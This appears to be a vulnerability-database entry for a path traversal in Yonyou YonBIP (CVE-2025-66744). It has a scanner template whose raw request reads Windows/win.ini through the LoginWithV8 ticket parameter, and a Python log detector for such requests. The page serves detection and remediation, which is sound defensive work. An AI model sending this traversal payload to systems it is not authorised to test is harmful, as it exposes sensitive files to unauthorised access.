Yonyou YonBIP - Path Traversal
CVE-2025-66744
Verified
Description
Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
Severity
High
CVSS Score
7.5
Exploit Probability
6%
Published Date
February 10, 2026
Template Author
dhiyaneshdk
CVE-2025-66744.yaml
id: CVE-2025-66744
info:
  name: Yonyou YonBIP - Path Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
  impact: |
    Unauthorized attackers can access sensitive system information, potentially leading to data exposure.
  remediation: |
    Update to the latest version beyond v3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-66744
    - https://github.com/iSee857/YonYouBip-path-travel
  classification:
    cve-id: CVE-2025-66744
    epss-score: 0.05595
    epss-percentile: 0.90402
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="YonBIP | 数据应用服务"
  tags: cve,cve2025,yonbip,lfi,vkev
http:
  - raw:
      - |
        GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[fonts]"
          - "[extensions]"
          - "Message"
        condition: and
      - type: status
        status:
          - 200
# digest: 490a0046304402205f0b4f0cc9c9d0904dae6488b3af191f158fb01ebab16e6e04d78da0e6fc2ef202200afb2a2e6ca79ff4510fd6036fce427cd8c40f1b5e67310bd316c6dfb06b4f0a:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-66744
Remediation Steps
Update to the latest version beyond v3.
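Log Detection Example
The following is an added example, not part of the template or the vendor's code: a log check that flags requests to the LoginWithV8 endpoint whose ticket parameter contains a ".." path segment, as in the request above. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint named in the template; compared case-insensitively, trailing slash ignored.
ENDPOINT = "/bi/api/portal/loginwithv8"
# Request portion of a combined-format access log line (the log format is an assumption).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_dot_segment(value):
    """True when any path segment of the value is '..' (either slash style)."""
    return ".." in value.replace("\\", "/").split("/")

def find_traversal_hits(lines):
    """Return (client_ip, status, decoded_ticket) for suspicious LoginWithV8 requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path.rstrip("/").lower() != ENDPOINT:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("ticket", []):
            ticket = fully_decode(raw)
            if has_dot_segment(ticket):
                hits.append((m.group("ip"), int(m.group("status")), ticket))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Feb/2026:08:14:02 +0000] "GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Feb/2026:08:15:40 +0000] "GET /bi/api/Portal/LoginWithV8/?ticket=ST-4821-abcDEF HTTP/1.1" 200 230',
    '198.51.100.7 - - [10/Feb/2026:08:16:11 +0000] "GET /bi/api/Portal/LoginWithV8?ticket=%2F..%2F..%2FWindows%2Fwin.ini HTTP/1.1" 404 0',
    '192.0.2.33 - - [10/Feb/2026:08:17:05 +0000] "GET /bi/index.html?ticket=../x HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, status, ticket in find_traversal_hits(SAMPLE_LOG):
        print(f"{ip} status={status} ticket={ticket}")
```

A hit with status 200 is the one to triage first, since the template's matchers also require a 200 response.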